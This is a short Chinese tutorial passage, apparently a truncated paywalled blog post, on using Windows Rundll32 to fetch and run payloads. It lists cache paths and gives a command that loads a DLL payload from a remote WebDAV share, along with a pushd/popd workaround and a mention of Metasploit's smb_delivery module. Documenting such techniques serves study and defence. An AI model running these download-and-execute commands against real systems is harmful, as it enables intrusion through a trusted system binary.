本文探讨了如何通过Rundll32在Windows系统中下载和执行payload,详细介绍了不同下载方式下文件的缓存位置,并讨论了使用Rundll32结合WebDAV和Metasploit的exploit/windows/smb/smb_delivery模块进行远程执行的命令格式。同时提到了Win7和Win10执行效果的差异,以及Rundll32调用内联脚本的可能性。
声明:本文介绍的内容仅用于学习和研究目的,请勿用做非法用途。
取决于Windows系统的版本,通过HTTP下载的文件缓存位置为IE的本地缓存,在下面的路径之一:
- C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
- C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE<subdir>
使用指向WebDav服务器的UNC路径下载的文件将保存在WebDAV客户端本地缓存:
- C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV
在使用UNC路径下载payload时,需要WebClient 服务启动,如果没有启动,可在命令行前面加上pushd \\webdavserver & popd命令。
Rundll32下载&执行
使用rundll32远程下载payload并执行的命令格式为:
rundll32 \\webdavserver\folder\payload.dll,entrypoint
网络调用进程:svchost.exe,payload缓存:WebDav 客户端本地缓存。
利用metasploit的exploit/windows/smb/smb_delivery:
配置完对应参
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
